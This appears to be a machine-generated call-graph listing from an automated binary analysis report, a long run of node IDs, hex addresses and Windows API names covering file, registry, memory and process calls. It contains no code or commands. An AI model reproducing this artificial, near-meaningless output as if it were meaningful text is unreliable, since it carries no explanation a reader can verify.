__fread_nolock 70929->70937 71220 28359c 26 API calls 70930->71220 71217 21aceb 24 API calls 70931->71217 70934 2217ba 70934->70927 71216 2301f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 70934->71216 70935 221839 71218 22d217 196 API calls 70935->71218 70937->70935 70938 26636e 70937->70938 70942 22fddb 23 API calls 70937->70942 70945 21ec40 196 API calls 70937->70945 70946 22152f 70937->70946 70947 2663b2 70937->70947 70949 221872 70937->70949 71221 28359c 26 API calls 70938->71221 70942->70937 70943 2664fa 70943->70949 71224 28359c 26 API calls 70943->71224 70945->70937 70950 22153c 70946->70950 71223 295745 31 API calls _wcslen 70946->71223 71222 28359c 26 API calls 70947->71222 70949->70886 70950->70943 70950->70949 70953 22167b 70950->70953 71025 29959f 70950->71025 71028 28f0ec 70950->71028 71033 286ef1 70950->71033 71105 29958b 70950->71105 71108 22effa 70950->71108 71158 27d4ce 70950->71158 71161 28744a 70950->71161 70951 22171d 70951->70886 70953->70951 71214 22ce17 23 API calls 70953->71214 71604 21adf0 70961->71604 70963 21bf9d 70964 2604b6 70963->70964 70965 21bfa9 70963->70965 71623 28359c 26 API calls 70964->71623 70967 2604c6 70965->70967 70968 21c01e 70965->70968 71624 28359c 26 API calls 70967->71624 71609 21ac91 70968->71609 70971 21c603 70971->70886 70972 277120 23 API calls 70986 21c039 __fread_nolock 70972->70986 70977 2604f5 70980 26055a 70977->70980 71625 22d217 196 API calls 70977->71625 70980->70971 71626 28359c 26 API calls 70980->71626 70981 21ec40 196 API calls 70981->70986 70982 21af8a 23 API calls 70982->70986 70983 26091a 71636 283209 24 API calls 70983->71636 70986->70971 70986->70972 70986->70977 70986->70980 70986->70981 70986->70982 70986->70983 70987 21c350 __fread_nolock 70986->70987 70988 2608a5 70986->70988 70989 21c237 70986->70989 70993 260591 70986->70993 70996 2608f6 70986->70996 71005 22fddb 23 API calls 70986->71005 71007 2609bf 70986->71007 71613 21ad81 70986->71613 71628 277099 23 API calls __fread_nolock 70986->71628 71629 295745 31 API calls _wcslen 70986->71629 71630 22aa42 23 API calls 70986->71630 71631 27f05c 23 API calls 70986->71631 71632 21a993 24 API calls 70986->71632 71633 21aceb 24 API calls 70986->71633 70999 21c3ac 70987->70999 71622 22ce17 23 API calls 70987->71622 70990 21ec40 196 API calls 70988->70990 71001 260976 70989->71001 71004 21c297 70989->71004 70992 2608cf 70990->70992 70992->70971 71634 21a81b 24 API calls 70992->71634 71627 28359c 26 API calls 70993->71627 71635 28359c 26 API calls 70996->71635 70999->70886 71637 21aceb 24 API calls 71001->71637 71004->71007 71620 21aceb 24 API calls 71004->71620 71005->70986 71007->70971 71638 28359c 26 API calls 71007->71638 71008 21c335 71008->71007 71009 21c342 71008->71009 71621 21a704 23 API calls 71009->71621 71011->70886 71012->70886 71013->70886 71014->70894 71015->70894 71016->70894 71017->70912 71018->70912 71019->70907 71020->70912 71021->70912 71022->70912 71023->70912 71024->70912 71225 297f59 71025->71225 71027 2995af 71027->70950 71029 217510 30 API calls 71028->71029 71030 28f126 71029->71030 71031 21ec40 196 API calls 71030->71031 71032 28f15b 71030->71032 71031->71032 71032->70950 71034 21a961 23 API calls 71033->71034 71035 286f1d 71034->71035 71036 21a961 23 API calls 71035->71036 71037 286f26 71036->71037 71038 286f3a 71037->71038 71470 21b567 71037->71470 71040 217510 30 API calls 71038->71040 71043 286f57 _wcslen 71040->71043 71041 286fbc 71044 217510 30 API calls 71041->71044 71042 2870bf 71045 214ecb 91 API calls 71042->71045 71043->71041 71043->71042 71104 2870e9 71043->71104 71057 286fc8 71044->71057 71046 2870d0 71045->71046 71047 2870e5 71046->71047 71049 214ecb 91 API calls 71046->71049 71048 21a961 23 API calls 71047->71048 71047->71104 71050 28711a 71048->71050 71049->71047 71051 21a961 23 API calls 71050->71051 71054 287126 71051->71054 71052 287027 71053 217510 30 API calls 71052->71053 71055 287034 71053->71055 71056 21a961 23 API calls 71054->71056 71060 28703d 71055->71060 71061 28712f 71056->71061 71057->71052 71058 2133c6 23 API calls 71057->71058 71059 28700f 71058->71059 71062 217510 30 API calls 71059->71062 71475 27e199 GetFileAttributesW 71060->71475 71064 21a961 23 API calls 71061->71064 71065 28701b 71062->71065 71067 287138 71064->71067 71068 216350 23 API calls 71065->71068 71066 287050 71069 287063 71066->71069 71072 214c6d 23 API calls 71066->71072 71070 217510 30 API calls 71067->71070 71068->71052 71071 217510 30 API calls 71069->71071 71079 287069 71069->71079 71073 287145 71070->71073 71074 2870a0 71071->71074 71072->71069 71337 21525f 71073->71337 71476 27d076 37 API calls 71074->71476 71076 287166 71369 214c6d 71076->71369 71079->71104 71081 2871a9 71084 216350 23 API calls 71081->71084 71082 214c6d 23 API calls 71083 287186 71082->71083 71083->71081 71085 216b57 23 API calls 71083->71085 71086 2871c8 71084->71086 71087 28719b 71085->71087 71088 216350 23 API calls 71086->71088 71090 216b57 23 API calls 71087->71090 71089 2871d6 71088->71089 71091 216350 23 API calls 71089->71091 71090->71081 71092 2871e4 71091->71092 71093 217510 30 API calls 71092->71093 71094 2871f0 71093->71094 71372 27d7bc 71094->71372 71096 287201 71097 27d4ce 4 API calls 71096->71097 71098 28720b 71097->71098 71099 217510 30 API calls 71098->71099 71102 287239 71098->71102 71100 287229 71099->71100 71417 282947 71100->71417 71103 214f39 64 API calls 71102->71103 71103->71104 71104->70950 71106 297f59 86 API calls 71105->71106 71107 29959b 71106->71107 71107->70950 71109 22f012 71108->71109 71110 22fddb 23 API calls 71109->71110 71112 22f0a4 71109->71112 71111 22f02b 71110->71111 71516 216246 71111->71516 71114 21b567 40 API calls 71112->71114 71119 22f0b1 71112->71119 71117 26f10a 71114->71117 71116 21a961 23 API calls 71118 22f04f 71116->71118 71117->71119 71120 26f112 71117->71120 71121 216246 CloseHandle 71118->71121 71493 22fa5b 71119->71493 71123 21b567 40 API calls 71120->71123 71124 22f056 71121->71124 71128 22f0b8 71123->71128 71125 217510 30 API calls 71124->71125 71126 22f062 71125->71126 71127 216246 CloseHandle 71126->71127 71129 22f06c 71127->71129 71130 22f0d3 71128->71130 71138 26f127 71128->71138 71520 215745 71129->71520 71498 216270 71130->71498 71135 26f0a0 71545 216216 CloseHandle 71135->71545 71136 22f085 71528 2153de 71136->71528 71143 26f140 71138->71143 71546 22f866 ReadFile SetFilePointerEx 71138->71546 71142 22f0ea 71148 26f144 __fread_nolock 71142->71148 71542 2162b5 23 API calls 71142->71542 71143->71148 71547 280e85 23 API calls ___scrt_fastfail 71143->71547 71146 22f093 71541 2153c7 SetFilePointerEx SetFilePointerEx SetFilePointerEx 71146->71541 71149 22f0fe 71150 22f138 71149->71150 71153 216246 CloseHandle 71149->71153 71150->70950 71151 22f09a 71151->71112 71152 26f069 71151->71152 71544 27ccff SetFilePointerEx SetFilePointerEx SetFilePointerEx WriteFile 71152->71544 71155 22f12c 71153->71155 71155->71150 71543 216216 CloseHandle 71155->71543 71156 26f080 71156->71112 71594 27dbbe lstrlenW 71158->71594 71162 287469 71161->71162 71163 287474 71161->71163 71164 21b567 40 API calls 71162->71164 71166 21a961 23 API calls 71163->71166 71194 287554 71163->71194 71164->71163 71165 22fddb 23 API calls 71167 287587 71165->71167 71168 287495 71166->71168 71171 216246 CloseHandle 71167->71171 71169 21a961 23 API calls 71168->71169 71170 28749e 71169->71170 71172 217510 30 API calls 71170->71172 71173 2875a3 71171->71173 71174 2874aa 71172->71174 71175 21a961 23 API calls 71173->71175 71177 21525f 23 API calls 71174->71177 71176 2875ab 71175->71176 71178 216246 CloseHandle 71176->71178 71179 2874bf 71177->71179 71180 2875b2 71178->71180 71181 216350 23 API calls 71179->71181 71182 217510 30 API calls 71180->71182 71183 2874f2 71181->71183 71184 2875be 71182->71184 71185 28754a 71183->71185 71186 27d4ce 4 API calls 71183->71186 71187 216246 CloseHandle 71184->71187 71190 21b567 40 API calls 71185->71190 71188 287502 71186->71188 71189 2875c8 71187->71189 71188->71185 71191 287506 71188->71191 71192 215745 5 API calls 71189->71192 71190->71194 71599 27d2c1 27 API calls 71191->71599 71193 2875e2 71192->71193 71196 2875ea 71193->71196 71197 2876de GetLastError 71193->71197 71194->71165 71212 2876a4 71194->71212 71200 2153de 28 API calls 71196->71200 71199 2876f7 71197->71199 71198 28751c 71198->71185 71603 216216 CloseHandle 71199->71603 71202 2875f8 71200->71202 71600 2153c7 SetFilePointerEx SetFilePointerEx SetFilePointerEx 71202->71600 71204 287645 71205 22fddb 23 API calls 71204->71205 71208 287679 71205->71208 71206 287619 71601 27ccff SetFilePointerEx SetFilePointerEx SetFilePointerEx WriteFile 71206->71601 71207 2875ff 71207->71204 71207->71206 71209 21a961 23 API calls 71208->71209 71211 287686 71209->71211 71211->71212 71602 27417d 23 API calls __fread_nolock 71211->71602 71212->70950 71214->70953 71215->70934 71216->70927 71217->70935 71218->70949 71219->70926 71220->70949 71221->70949 71222->70949 71223->70950 71224->70949 71261 217510 71225->71261 71227 297f90 71249 297fd5 71227->71249 71274 298cd3 71227->71274 71229 298281 71230 29844f 71229->71230 71235 29828f 71229->71235 71308 298ee4 50 API calls 71230->71308 71233 29845e 71234 29846a 71233->71234 71233->71235 71234->71249 71287 299096 71235->71287 71236 217510 30 API calls 71251 298049 71236->71251 71239 2982c8 71295 22fc70 71239->71295 71242 2982e8 71301 28359c 26 API calls 71242->71301 71243 298302 71302 2163eb 23 API calls 71243->71302 71246 2982f3 GetCurrentProcess TerminateProcess 71246->71243 71247 298311 71303 216a50 23 API calls 71247->71303 71249->71027 71250 29832a 71259 298352 71250->71259 71304 2204f0 23 API calls 71250->71304 71251->71229 71251->71236 71251->71249 71299 27417d 23 API calls __fread_nolock 71251->71299 71300 29851d 41 API calls _strftime 71251->71300 71252 2984c5 71252->71249 71256 2984d9 FreeLibrary 71252->71256 71254 298341 71305 298b7b 45 API calls 71254->71305 71256->71249 71259->71252 71306 2204f0 23 API calls 71259->71306 71307 21aceb 24 API calls 71259->71307 71309 298b7b 45 API calls 71259->71309 71262 217525 71261->71262 71270 217522 71261->71270 71263 21755b 71262->71263 71264 21752d 71262->71264 71267 21753d 71263->71267 71271 25507f 71263->71271 71272 25500f 71263->71272 71310 2351c6 27 API calls 71264->71310 71269 22fddb 23 API calls 71267->71269 71268 25510e 71268->71268 71269->71270 71270->71227 71311 235183 28 API calls 71271->71311 71272->71271 71273 22fddb 23 API calls 71272->71273 71273->71271 71312 21aec9 71274->71312 71276 298cee CharLowerBuffW 71316 278e54 71276->71316 71280 21a961 23 API calls 71281 298d2a 71280->71281 71323 216d25 71281->71323 71283 298d3e 71331 2193b2 23 API calls __fread_nolock 71283->71331 71285 298e5e _wcslen 71285->71251 71286 298d48 _wcslen 71286->71285 71332 29851d 41 API calls _strftime 71286->71332 71288 2992ab 71287->71288 71294 2990ba _strcat _wcslen 71287->71294 71288->71239 71289 21b567 40 API calls 71289->71294 71290 21b6b5 42 API calls 71290->71294 71291 217510 30 API calls 71291->71294 71292 23ea0c 22 API calls ___std_exception_copy 71292->71294 71294->71288 71294->71289 71294->71290 71294->71291 71294->71292 71336 27efae WideCharToMultiByte WideCharToMultiByte _wcslen 71294->71336 71296 22fc85 71295->71296 71297 22fd1d VirtualAlloc 71296->71297 71298 22fceb 71296->71298 71297->71298 71298->71242 71298->71243 71299->71251 71300->71251 71301->71246 71302->71247 71303->71250 71304->71254 71305->71259 71306->71259 71307->71259 71308->71233 71309->71259 71310->71267 71311->71268 71313 21aedc 71312->71313 71315 21aed9 __fread_nolock 71312->71315 71314 22fddb 23 API calls 71313->71314 71314->71315 71315->71276 71318 278e74 _wcslen 71316->71318 71317 278f63 71317->71280 71317->71286 71318->71317 71319 278ea9 71318->71319 71320 278f68 71318->71320 71319->71317 71333 22ce60 CompareStringW 71319->71333 71320->71317 71334 22ce60 CompareStringW 71320->71334 71324 216d91 71323->71324 71325 216d34 71323->71325 71335 2193b2 23 API calls __fread_nolock 71324->71335 71325->71324 71327 216d3f 71325->71327 71328 22fddb 23 API calls 71327->71328 71329 216d5a __fread_nolock 71327->71329 71330 254ca7 71328->71330 71329->71283 71331->71286 71332->71285 71333->71319 71334->71320 71335->71329 71336->71294 71338 21a961 23 API calls 71337->71338 71339 215275 71338->71339 71340 21a961 23 API calls 71339->71340 71341 21527d 71340->71341 71342 21a961 23 API calls 71341->71342 71343 215285 71342->71343 71344 21a961 23 API calls 71343->71344 71345 21528d 71344->71345 71346 253df5 71345->71346 71347 2152c1 71345->71347 71479 21a6c3 71346->71479 71348 216d25 23 API calls 71347->71348 71349 2152cf 71348->71349 71477 2193b2 23 API calls __fread_nolock 71349->71477 71352 2152d9 71353 215304 71352->71353 71354 216d25 23 API calls 71352->71354 71355 215349 71353->71355 71356 215325 71353->71356 71364 253e20 71353->71364 71358 2152fa 71354->71358 71357 216d25 23 API calls 71355->71357 71356->71355 71360 214c6d 23 API calls 71356->71360 71366 21535a 71357->71366 71478 2193b2 23 API calls __fread_nolock 71358->71478 71361 215332 71360->71361 71361->71355 71363 216d25 23 API calls 71361->71363 71362 216b57 23 API calls 71367 253ee0 71362->71367 71363->71355 71364->71362 71365 214c6d 23 API calls 71365->71367 71366->71076 71367->71355 71367->71365 71483 2149bd 23 API calls __fread_nolock 71367->71483 71370 21aec9 23 API calls 71369->71370 71371 214c78 71370->71371 71371->71081 71371->71082 71373 27d7d8 71372->71373 71374 27d7dd 71373->71374 71375 21a961 23 API calls 71373->71375 71374->71096 71376 27d7fb 71375->71376 71377 21a961 23 API calls 71376->71377 71378 27d803 71377->71378 71379 21a961 23 API calls 71378->71379 71380 27d80e 71379->71380 71381 21a961 23 API calls 71380->71381 71382 27d816 71381->71382 71383 21a961 23 API calls 71382->71383 71384 27d81e 71383->71384 71385 21a961 23 API calls 71384->71385 71386 27d826 71385->71386 71387 21a961 23 API calls 71386->71387 71388 27d82e 71387->71388 71389 21a961 23 API calls 71388->71389 71390 27d836 71389->71390 71391 21525f 23 API calls 71390->71391 71392 27d84d 71391->71392 71393 21525f 23 API calls 71392->71393 71394 27d866 71393->71394 71395 214c6d 23 API calls 71394->71395 71396 27d872 71395->71396 71397 27d885 71396->71397 71484 2193b2 23 API calls __fread_nolock 71396->71484 71399 214c6d 23 API calls 71397->71399 71400 27d88e 71399->71400 71401 27d89e 71400->71401 71485 2193b2 23 API calls __fread_nolock 71400->71485 71403 216350 23 API calls 71401->71403 71404 27d8bb 71403->71404 71405 214c6d 23 API calls 71404->71405 71406 27d8e7 71405->71406 71407 27d8fe 71406->71407 71408 27d8ec 71406->71408 71410 214c6d 23 API calls 71407->71410 71409 2133c6 23 API calls 71408->71409 71416 27d8f9 71409->71416 71411 27d907 71410->71411 71412 27d925 71411->71412 71414 2133c6 23 API calls 71411->71414 71413 216350 23 API calls 71412->71413 71413->71374 71414->71416 71415 216350 23 API calls 71415->71412 71416->71415 71418 282954 71417->71418 71419 215722 23 API calls 71418->71419 71420 28297b 71419->71420 71421 28274e 29 API calls 71420->71421 71422 282986 71421->71422 71423 21511f 59 API calls 71422->71423 71424 28299b 71423->71424 71425 282a6c 71424->71425 71426 2829bf 71424->71426 71427 282e66 71 API calls 71425->71427 71428 282e66 71 API calls 71426->71428 71443 282a38 71427->71443 71429 2829c4 71428->71429 71436 282a75 71429->71436 71490 23d583 27 API calls 71429->71490 71431 2150f5 41 API calls 71432 282a91 71431->71432 71433 2150f5 41 API calls 71432->71433 71435 282aa1 71433->71435 71434 2829ed 71491 23d583 27 API calls 71434->71491 71437 2150f5 41 API calls 71435->71437 71436->71102 71439 282abc 71437->71439 71440 2150f5 41 API calls 71439->71440 71441 282acc 71440->71441 71442 2150f5 41 API calls 71441->71442 71444 282ae7 71442->71444 71443->71431 71443->71436 71445 2150f5 41 API calls 71444->71445 71446 282af7 71445->71446 71447 2150f5 41 API calls 71446->71447 71448 282b07 71447->71448 71449 2150f5 41 API calls 71448->71449 71450 282b17 71449->71450 71486 283017 GetTempPathW GetTempFileNameW 71450->71486 71452 282b22 71453 23e5eb 30 API calls 71452->71453 71464 282b33 71453->71464 71454 282bed 71455 23e678 63 API calls 71454->71455 71456 282bf8 71455->71456 71458 282bfe DeleteFileW 71456->71458 71459 282c12 71456->71459 71457 2150f5 41 API calls 71457->71464 71458->71436 71460 282c91 CopyFileW 71459->71460 71466 282c18 71459->71466 71461 282cb9 DeleteFileW 71460->71461 71462 282ca7 DeleteFileW 71460->71462 71487 282fd8 CreateFileW 71461->71487 71462->71436 71464->71436 71464->71454 71464->71457 71465 23dbb3 59 API calls 71464->71465 71465->71464 71467 2822ce 75 API calls 71466->71467 71468 282c7c 71467->71468 71468->71461 71469 282c80 DeleteFileW 71468->71469 71469->71436 71471 21b578 71470->71471 71472 21b57f 71470->71472 71471->71472 71492 2362d1 40 API calls 71471->71492 71472->71038 71474 21b5c2 71474->71038 71475->71066 71476->71079 71477->71352 71478->71353 71480 21a6dd 71479->71480 71482 21a6d0 71479->71482 71481 22fddb 23 API calls 71480->71481 71481->71482 71482->71353 71483->71367 71484->71397 71485->71401 71486->71452 71488 282fff SetFileTime CloseHandle 71487->71488 71489 283013 71487->71489 71488->71489 71489->71436 71490->71434 71491->71443 71492->71474 71548 2154c6 71493->71548 71496 2154c6 3 API calls 71497 22fa9a 71496->71497 71497->71128 71499 216295 71498->71499 71500 22fddb 23 API calls 71499->71500 71501 2162a3 71500->71501 71502 22f141 71501->71502 71503 22f188 71502->71503 71504 22f14c 71502->71504 71505 21a6c3 23 API calls 71503->71505 71504->71503 71506 22f15b 71504->71506 71514 27caeb 71505->71514 71508 22f170 71506->71508 71509 22f17d 71506->71509 71507 27cb1a 71507->71142 71554 22f18e 71508->71554 71561 27cbf2 27 API calls 71509->71561 71512 22f179 71512->71142 71514->71507 71562 27ca89 ReadFile SetFilePointerEx 71514->71562 71563 2149bd 23 API calls __fread_nolock 71514->71563 71517 216250 71516->71517 71518 21625f 71516->71518 71517->71116 71518->71517 71519 216264 CloseHandle 71518->71519 71519->71517 71521 254035 71520->71521 71522 21575c CreateFileW 71520->71522 71523 21577b 71521->71523 71524 25403b CreateFileW 71521->71524 71522->71523 71523->71135 71523->71136 71524->71523 71525 254063 71524->71525 71526 2154c6 3 API calls 71525->71526 71527 25406e 71526->71527 71527->71523 71529 2153f3 71528->71529 71540 2153f0 71528->71540 71530 2154c6 3 API calls 71529->71530 71529->71540 71531 215410 71530->71531 71532 21541d 71531->71532 71533 253f4b 71531->71533 71535 215722 23 API calls 71532->71535 71534 22fa5b 3 API calls 71533->71534 71534->71540 71536 215433 71535->71536 71537 219a40 2 API calls 71536->71537 71538 21543f 71537->71538 71539 2154c6 3 API calls 71538->71539 71539->71540 71540->71146 71541->71151 71542->71149 71543->71150 71544->71156 71545->71112 71546->71143 71547->71148 71549 2154dd 71548->71549 71550 215564 SetFilePointerEx SetFilePointerEx 71549->71550 71551 253f9c SetFilePointerEx 71549->71551 71552 253f8b 71549->71552 71553 215530 71549->71553 71550->71553 71552->71551 71553->71496 71564 22f1d8 71554->71564 71560 22f1c1 71560->71512 71561->71512 71562->71514 71563->71514 71565 22f1ef 71564->71565 71566 22fddb 23 API calls 71565->71566 71567 22f1a6 71566->71567 71568 2197b6 71567->71568 71569 2197c7 71568->71569 71571 2197fc 71569->71571 71579 219a40 71569->71579 71571->71560 71572 216e14 MultiByteToWideChar 71571->71572 71573 216e40 71572->71573 71574 216e87 71572->71574 71576 216e55 MultiByteToWideChar 71573->71576 71575 21a6c3 23 API calls 71574->71575 71578 216e7b 71575->71578 71586 216e90 71576->71586 71578->71560 71580 219abb 71579->71580 71583 219a4e 71579->71583 71585 22e40f SetFilePointerEx 71580->71585 71581 219a7c 71581->71569 71583->71581 71584 219a8c ReadFile 71583->71584 71584->71581 71584->71583 71585->71583 71587 216ea3 71586->71587 71588 216f24 71586->71588 71587->71588 71590 216eaf 71587->71590 71593 2193b2 23 API calls __fread_nolock 71588->71593 71591 22fddb 23 API calls 71590->71591 71592 216eb9 __fread_nolock 71590->71592 71591->71592 71592->71578 71593->71592 71595 27d4d5 71594->71595 71596 27dbdc GetFileAttributesW 71594->71596 71595->70950 71596->71595 71597 27dbe8 FindFirstFileW 71596->71597 71597->71595 71598 27dbf9 FindClose 71597->71598 71598->71595 71599->71198 71600->71207 71601->71204 71602->71212 71603->71212 71605 21ae01 71604->71605 71608 21ae1c 71604->71608 71606 21aec9 23 API calls 71605->71606 71607 21ae09 CharUpperBuffW 71606->71607 71607->71608 71608->70963 71611 21acae 71609->71611 71610 21acd1 71610->70986 71611->71610 71639 28359c 26 API calls 71611->71639 71614 21ad92 71613->71614 71615 25fadb 71613->71615 71616 22fddb 23 API calls 71614->71616 71617 21ad99 71616->71617 71640 21adcd 71617->71640 71620->71008 71621->70987 71622->70987 71623->70967 71624->70971 71625->70980 71626->70971 71627->70971 71628->70986 71629->70986 71630->70986 71631->70986 71632->70986 71633->70986 71634->70996 71635->70971 71636->70989 71637->71007 71638->70971 71639->71610 71644 21addd 71640->71644 71641 21adb6 71641->70986 71642 22fddb 23 API calls 71642->71644 71643 21a961 23 API calls 71643->71644 71644->71641 71644->71642 71644->71643 71645 21adcd 23 API calls 71644->71645 71645->71644 71646 248402 71651 2481be 71646->71651 71649 24842a 71656 2481ef try_get_first_available_module 71651->71656 71653 2483ee 71670 2427ec 27 API calls pre_c_initialization 71653->71670 71655 248343 71655->71649 71663 250984 71655->71663 71662 248338 71656->71662 71666 238e0b 39 API calls 2 library calls 71656->71666 71658 24838c 71658->71662 71667 238e0b 39 API calls 2 library calls 71658->71667 71660 2483ab 71660->71662 71668 238e0b 39 API calls 2 library calls 71660->71668 71662->71655 71669 23f2d9 21 API calls __dosmaperr 71662->71669 71671 250081 71663->71671 71665 25099f 71665->71649 71666->71658 71667->71660 71668->71662 71669->71653 71670->71655 71674 25008d __FrameHandler3::FrameUnwindToState 71671->71674 71672 25009b 71729 23f2d9 21 API calls __dosmaperr 71672->71729 71674->71672 71676 2500d4 71674->71676 71675 2500a0 71730 2427ec 27 API calls pre_c_initialization 71675->71730 71682 25065b 71676->71682 71679 2500aa __wsopen_s 71679->71665 71732 25042f 71682->71732 71685 2506a6 71750 245221 71685->71750 71686 25068d 71764 23f2c6 21 API calls __dosmaperr 71686->71764 71689 2506ab 71690 2506b4 71689->71690 71691 2506cb 71689->71691 71766 23f2c6 21 API calls __dosmaperr 71690->71766 71763 25039a CreateFileW 71691->71763 71695 2506b9 71767 23f2d9 21 API calls __dosmaperr 71695->71767 71696 250781 GetFileType 71699 25078c GetLastError 71696->71699 71703 2507d3 71696->71703 71698 250756 GetLastError 71769 23f2a3 21 API calls __dosmaperr 71698->71769 71770 23f2a3 21 API calls __dosmaperr 71699->71770 71700 250704 71700->71696 71700->71698 71768 25039a CreateFileW 71700->71768 71772 24516a 22 API calls 2 library calls 71703->71772 71705 250692 71765 23f2d9 21 API calls __dosmaperr 71705->71765 71706 25079a CloseHandle 71706->71705 71709 2507c3 71706->71709 71708 250749 71708->71696 71708->71698 71771 23f2d9 21 API calls __dosmaperr 71709->71771 71710 2507f4 71712 250840 71710->71712 71773 2505ab 68 API calls 3 library calls 71710->71773 71717 25086d 71712->71717 71774 25014d 67 API calls 4 library calls 71712->71774 71713 2507c8 71713->71705 71716 250866 71716->71717 71718 25087e 71716->71718 71719 2486ae __wsopen_s 30 API calls 71717->71719 71720 2500f8 71718->71720 71721 2508fc CloseHandle 71718->71721 71719->71720 71731 250121 LeaveCriticalSection __wsopen_s 71720->71731 71775 25039a CreateFileW 71721->71775 71723 250927 71724 250931 GetLastError 71723->71724 71725 25095d 71723->71725 71776 23f2a3 21 API calls __dosmaperr 71724->71776 71725->71720 71727 25093d 71777 245333 22 API calls 2 library calls 71727->71777 71729->71675 71730->71679 71731->71679 71733 25046a 71732->71733 71734 250450 71732->71734 71778 2503bf 71733->71778 71734->71733 71785 23f2d9 21 API calls __dosmaperr 71734->71785 71736 2504a2 71740 2504d1 71736->71740 71787 23f2d9 21 API calls __dosmaperr 71736->71787 71738 25045f 71786 2427ec 27 API calls pre_c_initialization 71738->71786 71747 250524 71740->71747 71789 23d70d 27 API calls 2 library calls 71740->71789 71743 25051f 71745 25059e 71743->71745 71743->71747 71744 2504c6 71788 2427ec 27 API calls pre_c_initialization 71744->71788 71790 2427fc 11 API calls _abort 71745->71790 71747->71685 71747->71686 71749 2505aa 71751 24522d __FrameHandler3::FrameUnwindToState 71750->71751 71793 242f5e EnterCriticalSection 71751->71793 71754 245234 71755 245259 71754->71755 71759 2452c7 EnterCriticalSection 71754->71759 71762 24527b 71754->71762 71797 245000 71755->71797 71757 2452a4 __wsopen_s 71757->71689 71761 2452d4 LeaveCriticalSection 71759->71761 71759->71762 71761->71754 71794 24532a 71762->71794 71763->71700 71764->71705 71765->71720 71766->71695 71767->71705 71768->71708 71769->71705 71770->71706 71771->71713 71772->71710 71773->71712 71774->71716 71775->71723 71776->71727 71777->71725 71781 2503d7 71778->71781 71779 2503f2 71779->71736 71781->71779 71791 23f2d9 21 API calls __dosmaperr 71781->71791 71782 250416 71792 2427ec 27 API calls pre_c_initialization 71782->71792 71784 250421 71784->71736 71785->71738 71786->71733 71787->71744 71788->71740 71789->71743 71790->71749 71791->71782 71792->71784 71793->71754 71805 242fa6 LeaveCriticalSection 71794->71805 71796 245331 71796->71757 71798 244c7d _unexpected 21 API calls 71797->71798 71800 245012 71798->71800 71799 24501f 71801 2429c8 _free 21 API calls 71799->71801 71800->71799 71806 243405 12 API calls 2 library calls 71800->71806 71803 245071 71801->71803 71803->71762 71804 245147 EnterCriticalSection 71803->71804 71804->71762 71805->71796 71806->71800 71807 216a26 71808 22fddb 23 API calls 71807->71808 71809 216a33 71808->71809 71810 2303e9 71815 2309d5 SetUnhandledExceptionFilter 71810->71815 71812 2303ee pre_c_initialization 71816 234fa9 27 API calls 2 library calls 71812->71816 71814 2303f9 71815->71812 71816->71814 71817 211cad SystemParametersInfoW 71818 211033 71821 214c91 71818->71821 71820 211038 pre_c_initialization 71822 21a961 23 API calls 71821->71822 71823 214cff 71822->71823 71828 213af0 71823->71828 71826 214d9c 71827 214dba 71826->71827 71831 2151f7 23 API calls __fread_nolock 71826->71831 71827->71820 71832 213b1c 71828->71832 71831->71826 71833 213b0f 71832->71833 71834 213b29 71832->71834 71833->71826 71834->71833 71835 213b30 RegOpenKeyExW 71834->71835 71835->71833 71836 213b4a RegQueryValueExW 71835->71836 71837 213b80 RegCloseKey 71836->71837 71838 213b6b 71836->71838 71837->71833 71838->71837 71839 242317 71842 24d1f6 71839->71842 71845 24d213 71842->71845 71846 24d20f 71842->71846 71843 230a8c __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 71844 242326 71843->71844 71845->71846 71848 244bfb 71845->71848 71846->71843 71849 244c07 __FrameHandler3::FrameUnwindToState 71848->71849 71860 242f5e EnterCriticalSection 71849->71860 71851 244c0e 71861 2450af 71851->71861 71853 244c1d 71859 244c2c 71853->71859 71874 244a8f 30 API calls 71853->71874 71856 244c27 71875 244b45 GetStdHandle GetFileType 71856->71875 71858 244c3d __wsopen_s 71858->71845 71876 244c48 LeaveCriticalSection _abort 71859->71876 71860->71851 71862 2450bb __FrameHandler3::FrameUnwindToState 71861->71862 71863 2450df 71862->71863 71864 2450c8 71862->71864 71877 242f5e EnterCriticalSection 71863->71877 71878 23f2d9 21 API calls __dosmaperr 71864->71878 71867 2450cd 71879 2427ec 27 API calls pre_c_initialization 71867->71879 71869 245117 71880 24513e LeaveCriticalSection _abort 71869->71880 71870 2450d7 __wsopen_s 71870->71853 71871 2450eb 71871->71869 71873 245000 __wsopen_s 22 API calls 71871->71873 71873->71871 71874->71856 71875->71859 71876->71858 71877->71871 71878->71867 71879->71870 71880->71870 71881 212e37 71882 21a961 23 API calls 71881->71882 71883 212e4d 71882->71883 71942 214ae3 71883->71942 71885 212e6b 71886 214ecb 91 API calls 71885->71886 71887 212ea5 71886->71887 71888 252cb0 71887->71888 71892 212ead 71887->71892 71889 282cf9 77 API calls 71888->71889 71890 252cc3 71889->71890 71891 252ccf 71890->71891 71893 214f39 64 API calls 71890->71893 71895 214f39 64 API calls 71891->71895 71953 216f88 23 API calls 71892->71953 71893->71891 71897 252ce5 71895->71897 71896 212ecf 71954 21a81b 24 API calls 71896->71954 71969 213084 23 API calls 71897->71969 71900 252d02 71970 213084 23 API calls 71900->71970 71901 212eec 71955 21a81b 24 API calls 71901->71955 71903 252d1e 71971 213084 23 API calls 71903->71971 71905 212f21 71908 21a961 23 API calls 71905->71908 71907 252d50 71972 213084 23 API calls 71907->71972 71909 212f3f 71908->71909 71956 213084 23 API calls 71909->71956 71911 212f4b 71957 234a28 39 API calls 3 library calls 71911->71957 71914 212f59 71914->71897 71915 212f63 71914->71915 71958 234a28 39 API calls 3 library calls 71915->71958 71917 252d6d 71973 213084 23 API calls 71917->71973 71918 212f6e 71918->71900 71920 212f78 71918->71920 71959 234a28 39 API calls 3 library calls 71920->71959 71921 252d90 71923 212f83 71923->71903 71924 212f8d 71923->71924 71960 234a28 39 API calls 3 library calls 71924->71960 71926 212f98 71927 212fdc 71926->71927 71961 213084 23 API calls 71926->71961 71927->71917 71928 212fe8 71927->71928 71928->71921 71963 2163eb 23 API calls 71928->71963 71930 212fbf 71962 213084 23 API calls 71930->71962 71932 212ff8 71964 216a50 23 API calls 71932->71964 71935 213006 71965 2170b0 24 API calls 71935->71965 71939 213021 71940 213065 71939->71940 71966 216f88 23 API calls 71939->71966 71967 2170b0 24 API calls 71939->71967 71968 213084 23 API calls 71939->71968 71943 214af0 71942->71943 71944 216b57 23 API calls 71943->71944 71945 214b22 71943->71945 71944->71945 71946 214c6d 